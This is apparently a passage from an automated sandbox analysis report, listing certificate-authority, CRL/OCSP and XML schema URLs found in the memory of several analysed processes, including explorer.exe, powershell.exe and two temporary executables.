                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micE
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                              Source: explorer.exe, 00000004.00000002.3376670796.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                              Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                              Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModeld
                              Source: explorer.exe, 00000004.00000000.2051826790.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3422880933.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3464363955.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
